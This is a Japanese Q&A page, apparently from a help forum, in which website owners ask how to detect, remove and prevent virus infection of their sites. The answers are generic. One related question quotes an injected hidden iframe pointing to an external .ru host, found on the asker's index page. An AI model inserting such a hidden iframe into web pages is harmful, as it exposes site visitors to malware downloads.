• ベストアンサー

ホームページのウィルス対策

ウィルスはメールを介して被害に遭うのが圧倒的に 多いそうですが、ウィルスに感染しているホームページを見ても 感染すると聞きました。そこで・・・。 (1) 自分もホームページ運営者の一人ですが、 自分のページが万一感染してら、どうすれば対処 できますか? (2) 感染している否か判断するにはどのようにすれば   いいですか? (3) 感染を防ぐにはどうすればいいですか? 上記の点、よろしくお願い申し上げます。

質問者が選んだベストアンサー

  • ベストアンサー
  • PC-GATE
  • ベストアンサー率38% (552/1446)
回答No.1

(1)(2)(3)共アンチウイルスやファイアウォールが必要に思います。 ホームページをどのような形(自サーバー、借サーバー)で運用されているのかで違いますが、自サーバの場合は導入すれば済む事ですが借サーバーの場合は管理会社にお問い合わせください。

tsuyo_1002
質問者

お礼

回答ありがとうございました。

関連するQ&A

  • 自分のホームページがウィルスに感染したら?

    「ウィルスに感染したため、仮閉鎖します」というページを見かけます。 もし、自分のホームページがウィルスに感染した場合、どういった対処をすればよいでしょうか? 初心者なので、具体的に教えて頂けると嬉しいです。

  • ホームページのウイルス?

    最近ホームページを立ち上げました。 OSはMAC10.3。FTP送信ソフトはFTECHを使っています。 それで、リンクをあるサイトへお願いしたのですが、管理者がページを見たところ、あるページへ行くとウイルス対策ソフト(ノートンだそうです)の警告が表示され遮断されてしまうそうです。 スクリプト等、特に変わったことをしているわけでもありません。タグで単純に組んであるだけです。 自分のパソコンが感染していなくても、ページ??だけウイルスに感染しているのでしょうか? それともタグの組み方などでバグが発生したりするのでしょうか? よろしければ、お教え下さい。

    • ベストアンサー
    • Mac
  • ホームページのウイルス

    ホームページ閲覧によって感染するウイルスがあると聞きました。(いくつかのホームページで実際に、感染していたため一時閉鎖、ということを訊いたりもしました)。 けれど、どうやったら、感染したかが分かるのかが分かりません。何か検索のようなものがあるのでしょうか。 調べたのですが、用語がよく分からず、自分の無知のなのが恥ずかしいのですが、上手く情報に辿りつけませんでした…。 ワームウイルスなどは、オンラインスキャンで見つけられますよね? 同じように、ホームページに潜むウイルスも、オンラインスキャンで見つけられるのでしょうか? また、もしそのようなシステムがあるのでしたら、どうか教えてください。

  • ホームページにウィルスは感染する?

    ホームページをいくつか持っています。 このホームページ自体にウィルスを感染させることが可能だと聞いたことがありますが、本当でしょうか? 第三者が私の作成したHPにウィルスを感染させてしまうことができるのでしょうか? そして、もし感染した場合、除去の仕方はどうしたらよいのですか? 自分で作成したときのフォルダー、ファイルを全てスキャンして、削除してからアップロードすればそれでまたクリーンになるものなのでしょうか? 宜しくお願いします。

  • ウィルス? @自宅サーバー

    いわゆる自宅サーバーでホームページを作っているのですが、最近ウィルスに感染しているのかと思えることがあります。 偶然アクセスした http://www.fukkou.com/ というページが自分のホームページの全くのコピーなのです。 そんな物好きもいるのかと、当初はデータを全てコピーされたのか等と考えていました。しかし、こちらのデータを変えると同時にそれがそのままそれに反映されることが分かり、パソコン自体が病んでいるのかなと考えるようになりました。(全ての回線を切断して、初めて訪れるページのリンクをクリックしてもそれを表示してしまうのです。) ここで質問させて頂きたいのは、私のパソコンがウィルスか何かに感染しているのか、それとも、上記のホームページがそのような特異なものなのかということです。 また、もしもウィルスに感染しているのであれば、どのような治療をすればよいのかということです。 よろしくお願いします。

  • ウィルス定義ファイルとホームページについて

    ウィルスに感染したのかウィルス定義ファイルのみエラーとなってしまい、ホームページ(トップページ?)が "res://~"というわけの解からない英字ページに書き換えられてしまいました。 こういう事態が初めてなのでどうして良いか判らず色々したのですがホームページは元に戻しても再起動すると元に戻ってしまいます・・・。 ぜひ解決法を教えて下さい。

  • ウィルス感染・・・

    運営をしているサイトにウィルスが感染してしまいました。 パソコンにウィルスが感染した場合の対処方法は だいたいわかっているのですが、サイトに感染してしまった場合の 対処方法がわかりません・・・。 知っている方、どうか教えてください。

  • 運営中ホームページでウイルス警告

    自分が運営しているホームページで、ウイルスバスターを利用している閲覧者様に「危険なサイトという警告が出ますが安全面大丈夫ですか?」という連絡が来ました。 自分はノートンを利用しておりますが、問題のホームページを開いても警告などは発生せず、ローカルで保存しているサイトファイル等をスキャンしてもウイルスやスパイウェア検出がなされません。 そこで以下質問です。 1.ノートンで警告されなくても何かしらの脅威に感染していることはありますか? 2.ローカルでは問題なくてもFFFTPでアップすると脅威になることなどありますか? 3.連絡をくださった閲覧者様のウイルスバスター警告が出ないようにするにはどうしたらいいですか? 4.ホームページのウイルススキャンなどできるオンラインサービスなどありますか?(ローカルデータのスキャンができるものは見つけたんですが) ちなみにサイト自体はページ数が少なくシンプルな作りです。 javascript、CGIを使用しています。 余り詳しくないのでうまく質問できませんが、アドバイスいただけると幸いです。 何か足りないことなどありましたら随時補足させていただきます。

  • ホームページのウイルス?スパム?について・・・

    ホームページを作成して約2年ほど公開しています。 ここ1ヵ月もたたないぐらいから作成したホームページを閲覧するとページの表示のされかたがおかしく、ページのトップがmargin-top200pxぐらい自動でかかっています。 しかもウイルスソフトにも引っかかります。 自分の記入ミスだと思い、確認したのですが、記述に間違いはなくページのtopにmargin-top200pxの記述はしていませんでした。 不気味に思ったので、サーバーにあがっているファイルを一時削除してもう一度アップしなおしました。 ところが数日後また同じ現象が起きていました。 毎回ウイルスソフトが「アクセスしたファイルは感染しています」と表示されます。 おかしいと思ったので、表示されているページのソースをブラウザ上からみたところ<html><head></head><body>のところに <iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe> という記述がありました。 これを調べたのですが、何も得られず、削除をしても数日後には復活しています。 また、必ずindex.htmlファイルが感染しているようです。 他のページ(member.html)などは感染していませんでした。 友達のPC(ウイルスバスター)でも引っかかると言っていました。 自分のはウイルスソフトはAVGを使用しています。 質問内容はまずどのようにしたら感染しているものを削除できるのでしょうか? また、<iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe>はなんでしょうか? ご教授お願いします。

  • 他人のホームページにウイルスを仕込める?

    こんにちは、よろしくお願いします。 他人のホームページを勝手に改ざんするウイルスがいることは知っているのですが、他人のホームページを改ざんしたり、ウイルスを仕込んだりするのはハッキングとかでもできることなのでしょうか?例えば、AさんがBという団体の悪事を暴くようなホームページを作ったとします。で、そのホームページを快く思わないBは、優秀なハッカーなどを雇い、世間の人がAのホームページを見なくなるように、Aのホームページにウイルスを貼付ける、、、といったことは起こりえるのでしょうか? つまり私の質問は、何かの悪事を告発するようなホームページを立ち上げる場合、ホームページに細工されないようにするには、ウイルス感染にだけ気をつければ良いのか?ということです。また、「そういうホームページを立ち上げる際は、こんなことに気をつけたほうがいい」、みたいな注意点もありましたら、どなたかご教授いただければ幸いです。